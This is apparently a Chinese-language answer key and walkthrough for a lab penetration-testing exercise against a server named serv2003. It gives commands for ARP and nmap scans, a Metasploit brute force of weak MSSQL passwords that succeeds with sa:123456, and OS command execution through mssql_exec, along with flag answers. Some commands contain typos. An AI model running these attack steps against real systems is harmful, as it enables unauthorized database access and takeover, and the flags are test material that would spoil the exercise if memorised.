ARP扫描渗透测试
1.1 1.通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令的参数字符串作为Flag提交;(16分)
完整操作    arping –c  5  192.168.X.X
答案flag        -c
1.2通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;(17分)
完整操作    arping –c  5  192.168.X.X
答案flag        5
1.3通过本地PC中渗透测试平台BT5对服务器场景serv2003行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;(16分)
完整操作    msfconsole ; search arp_sweep ;
答案flag        auxiliary/scanner/discovery/arp_sweep
1.4通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景serv2003在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;(17分)
完整操作use auxiliary/scanner/discovery/arp_sweep; show options; set rhosts ;run/exploit
答案flag  completed
1.5通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工
具Metasploit中arp_sweep模块),假设目标服务器场景serv2003在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;(16分)
完整操作
答案flag  appears(呈现-开机)  invalid(不能识别-关机)
1.6通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景serv2003在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交。(18分)
完整操作
答案flag run或者exploit
MSSQL数据库渗透测试(100分)
2.1在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景serv2003所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。并将该操作使用的命令中必须要使用的字符串作为FLAG提交;(10分)
完整操作 zenmap; 目标192.168.1.100/24;命令nmap -p 1433,3306,80 -T4 -A -v 192.168.1.100/24
答案flag    -p 1433,3306,80
2.2通过本地PC中渗透测试平台BT5对服务器场景serv2003进行系统服务及版本扫描渗透测试,并将该操作显示结果中mssql数据库服务对应的服务端口信息作为FLAG提交;(10分)
完整操作    nmap -sV 192.168.1.100
答案flag        1433/tcp
2.3在本地PC渗透测试平台BT5中使用MSF中模块对其爆破,使用search命令,并将扫描弱
口令模块的名称作为FLAG提交;(10分)
完整操作    msfconsole;search mssql_login;
答案flag        mssql_login
2.4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);(10分)
完整操作    show options
答案flag        RHOSTS,PASS_FILE,THREADS,USERNAME
2.5在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;(10分)
完整操作  set RHOSTS 192.168.X.X
答案flag        set RHOSTS
2.6登陆靶机共享,将共享文件夹password里的下载到攻击机BT5本地,在msf模块中指定密码字典,字典路径为/爆破获取密码并将得到的密码作为FLAG提交;(14分)
完整操作
我们这里做的时候先自己创建字典文件,再爆破。
            先用vim  /创建用户名字典  输入常见用户名,admin,administrator,root,toor,sa(每个单词占一行);再vim  /创建密码字典,输入常见密码,1234,tbb,tbb123,88888,999999,123456(注意字典中必须有一个用户名和密码是正确的,才能爆破)
msf5 auxiliary(scanner/mssql/mssql_login) > set user_file  /
user_file => /
msf5 auxiliary(scanner/mssql/mssql_login) > set pass_file /
pass_file => /
msf5 auxiliary(scanner/mssql/mssql_login) > run
仔细看结果Login Successful:为成功的进入
[-] 192.168.1.7:1433      - 192.168.1.7:1433 - LOGIN FAILED: WORKSTATION\sa:tbb8342tbb (Incorrect: )
[+] 192.168.1.7:1433      - 192.168.1.7:1433 - Login Successful: WORKSTATION\sa:123456
[-] 192.168.1.7:1433      - 192.168.1.7:1433 - LOGIN FAILED: WORKSTATION\toor:tbb (Incorrect: )
答案flag        123456
2.7在msf模块中切换新的渗透模块,对服务器场景serv2003进行数据库服务扩展存储过程进行利用,将调用该模块的命令作为FLAG提交;(14分)
完整操作  searsh  mssql_exec
答案flag        use auxiliary/admin/mssql/mssql_exec
2.8在上一题的基础上,使用第6题获取到的密码并进行提权,同时使用show options命令查看需要的配置,并配置CMD参数来查看系统用户,将配置CMD参数的命令作为FLAG提交;(14分)
完整操作
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_exec
msf5 auxiliary(admin/mssql/mssql_exec) > show options
msf5 auxiliary(admin/mssql/mssql_exec) > set PASSWORD 123456
PASSWORD => 123456
msf5 auxiliary(admin/mssql/mssql_exec) > set /c net user
答案flag        set /c net user
2.9在利用msf模块获取系统权限并查看目标系统的异常(黑客)用户,并将该用户作为FLAG提交。(8分)
完整操作 接上题操作set /c 'md c:\aaaa111';run;可在目标机C盘建立文件夹(通过sql漏洞提权,可执行一切操作,可怕)
答案flag        Hacker
主机发现与信息收集
3.1通过本地PC中渗透测试平台BT5使用fping对服务器场景serv2003所在网段(例如:172.16.101.0/24)进行主机发现扫描,并将该操作使用的命令中必须要使用的参数作为FLAG提交;(12分)
完整操作  fping g
答案flag    -g
3mysql存储过程题目.2通过本地PC中渗透测试平台BT5使用genlist对服务器场景serv2003所在网段进行扫描进行主机存活发现, 并将该操作使用的命令中必须要使用的参数作为FLAG提交;(12分)
完整操作    genlist -s 192.168.1.*
答案flag    -s
3.3在通过本地PC中渗透测试平台BT5使用nbtscan对服务器场景serv2003所在网段进搜索扫描,获取目标的MAC地址等信息,并将该操作使用的命令中必须要使用的参数作为FLAG提交;(12分)
完整操作
完整操作    nbtscan r  192.168.15.1/24
答案flag    -r
3.4假设服务器场景serv2003设置了防火墙无法进行ping检测,通过PC中渗透测试平台BT5使用arping检测主机连通性扫描(发送请求数据包数量为 4个),并将该操作使用的命令中固定不变的字符串作为FLAG提交;(12分)
完整操作    arping c 4 192.168.15.110
答案flag    arping -c 4
3.5通过本地PC中渗透测试平台BT5使用fping对服务器场景serv2003所在网段进行存活性扫描,且要把最终扫描的存活主机输出到文件ip.txt中,并将该操作使用的命令中必须要使用的参数作为FLAG提交(各参数之间用英文逗号分割,注意题目要求的先后顺序,例a,b);(12分)
完整操作  fping 192.168.15.110 g a
答案flag    -g,-a
3.6通过本地PC中渗透测试平台BT5使用nbtscan从第5题的ip.txt文件中读取IP扫描主机信息MAC地址等信息,并将该操作使用的命令中固定不变的字符串作为FLAG提交;(12分)

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。